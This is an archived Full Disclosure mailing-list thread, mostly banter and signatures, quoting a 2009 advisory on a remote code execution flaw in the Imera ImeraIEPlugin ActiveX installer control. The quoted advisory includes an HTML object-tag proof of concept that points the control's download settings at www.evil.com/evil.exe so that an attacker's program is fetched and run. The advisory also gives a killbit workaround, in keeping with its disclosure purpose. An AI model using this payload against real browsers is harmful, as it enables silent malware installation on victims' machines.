Full Disclosure mailing list archives
Re: Imera ImeraIEPlugin ActiveX Control Remote Code Execution
From: bobby.mugabe () hushmail com
Date: Wed, 04 Mar 2009 14:14:23 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mr. Stark, What difficulties have you encountered while posting to this list? - -bm On Wed, 04 Mar 2009 13:59:45 -0500 Jason Starks <jstarks440 () gmail com> wrote:
That is why most of them are submitted to bugtraq (ew), and not FD, where they are often discredited in various ways. You see, bugtraq will reject 4 out of 7 postings if your not a subscriber to their super fun security package, which offers lots of enjoyment of white hat and hacking zone-h labs. On this ridiculus list, its hard not to get your post through! Kazaa! On Wed, Mar 4, 2009 at 3:51 AM, bob jones <bholdaaa () gmail com> wrote:doesn't submitting lame bugs in useless apps ever get old? On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad<elazar () hushmail com> wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Imera(http://www.imera.com) Imera TeamLinksClient(http://teamlinks.imera.com/install.html)What: ImeraIEPlugin.dll Version 1.0.2.54 Dated 12/02/2008 {75CC8584-86D4-4A50-B976-AA72618322C6} http://teamlinks.imera.com/ImeraIEPlugin.cab How: This control is used to install the Imera TeamLinks Client package. The control fails to validate the content that it istodownload and install is indeed the Imera TeamLinks Clientsoftware.Exploiting this issue is quite simple, like so: <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6" id="obj"> <param name="DownloadProtocol" value="http" /> <param name="DownloadHost" value="www.evil.com" /> <param name="DownloadPort" value="80" /> <param name="DownloadURI" value="evil.exe" /> </object> Fix: The vendor has been notified. Workaround: Set the killbit for the affected control, see http://support.microsoft.com/kb/240797. Use the Java installer for TeamLinks Client or install thesoftwaremanually from: http://teamlinks.imera.com/download.html Elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified athttps://www.hushtools.com/verifyVersion: Hush 3.0wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+q h/03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289P mqC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22 sBDrpVM8= =R0h3 -----END PGP SIGNATURE----- -- Thinking of a life with religion? Click here to find areligious schoolnear you.http://tagline.hushmail.com/fc/BLSrjkqkOt2ULsSphoguIMPooi9T2eJVBhBN EJeyTxDH8nsQ8r6djRRztwU/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmu0q4ACgkQhNp8gzZx3si+qwP/Td5ZfCGAmEqHEpQi6uYGQC+fsw+B ccjg0iOFqIXFFOLVHoS5QhOC1KshSxGQ2qHZUExH4H5Vo9YIO43YuGYtYJRJGBsH4Y5z EK3Bof1DNf4DOZ2eYAQdAzPch6yx6xq4pvLntSPu0cJ+5KdDaH7/6tqeyu3Hs8iItz7w 50hFFC4= =M4GG -----END PGP SIGNATURE----- -- Save hundreds on Computer Training. Click here. http://tagline.hushmail.com/fc/BLSrjkqaI8YbaAC7OKMyPV21xZA75vP9Y8orUJ0hENzoviZYSR8vU9DW19G/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Imera ImeraIEPlugin ActiveX Control Remote Code Execution bobby . mugabe (Mar 04)
- Re: Imera ImeraIEPlugin ActiveX Control Remote Code Execution Jeremy Brown (Mar 04)